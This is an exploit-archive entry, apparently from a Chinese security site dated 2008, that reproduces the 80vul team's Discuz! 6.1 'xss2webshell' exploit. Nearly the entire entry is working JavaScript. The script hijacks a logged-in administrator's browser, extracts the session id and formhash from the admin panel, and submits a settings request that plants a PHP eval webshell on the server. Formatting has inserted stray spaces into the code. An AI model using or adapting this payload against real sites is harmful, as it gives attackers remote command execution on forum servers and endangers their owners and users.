Discuz! 6.1 xss2webshell Exploit-vulnerability warning-the black bar safety net

2008-11-28T00:00:00
ID MYHACK58:62200821244
Type myhack58
Reporter 佚名
Modified 2008-11-28T00:00:00

Description

/*

#######################################

Discuz! 6.1 xss2webshell[SODB-2 0 0 8-1 0] Exploit by 80vul-A team: http://www.80vul.com

#######################################

*/ //Target url var siteurl='http://www.80vul.com/Discuz_6.1.0/';

var request = false; if(window. XMLHttpRequest) { request = new XMLHttpRequest(); if(request. overrideMimeType) { request. overrideMimeType('text/xml'); } } else if(window. ActiveXObject) { var versions = ['Microsoft. XMLHTTP', 'MSXML. XMLHTTP', 'Microsoft. XMLHTTP', 'Msxml2. XMLHTTP. 7. 0','Msxml2. XMLHTTP. 6. 0','Msxml2. XMLHTTP. 5. 0', 'Msxml2. XMLHTTP. 4. 0', 'MSXML2. XMLHTTP. 3. 0', 'MSXML2. XMLHTTP']; for(var i=0; i<versions. length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } xmlhttp=request;

//Get the sid xmlhttp. open("GET", siteurl+"admincp. php? frames=yes", false); //firefox3 can't use xmlhttp. send(); http://hi.baidu.com/aullik5/blog/item/fd0648fa4ef44762034f564e.html //thx luoluo@ph4nt0m.org xmlhttp. send(null); var echo = xmlhttp. responseText; var reg = /action=home&sid=([\w\d]+)\" /i; var arr=reg. exec(echo); if(! arr){ //Does not log in the background //alert(document. cookie); }else{ var sid=arr[1]; }

//Get the formhash xmlhttp. open("GET", siteurl+"admincp. php? action=home&sid="+sid, false); xmlhttp. send(null); var echo = xmlhttp. responseText; var reg = / name=\"formhash\" value=\"([\w\d]+)\"/i; var arr=reg. exec(echo); window. onerror=function(){return true;} var formhash=arr[1]; //alert(formhash);

//By the SODB-2 0 0 8-1 0 write webshell //http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txt xmlhttp. open("POST", siteurl+"admincp. php? action=runwizard&step=3", false); xmlhttp. setRequestHeader("Referer", siteurl); xmlhttp. setRequestHeader("Content-Type","application/x-www-form-urlencoded"); xmlhttp. send(unescape("settingsnew%5Bbbname%5D=%3C%3F@eval($_POST[cmd])%3A%3F%3E&settingsnew%5Bsitename%5D=Comsenz+Inc.& amp;settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww. comsenz. com%2F&step2submit=+%CF%C2%D2%BB%B2%BD+&formhash="+formhash));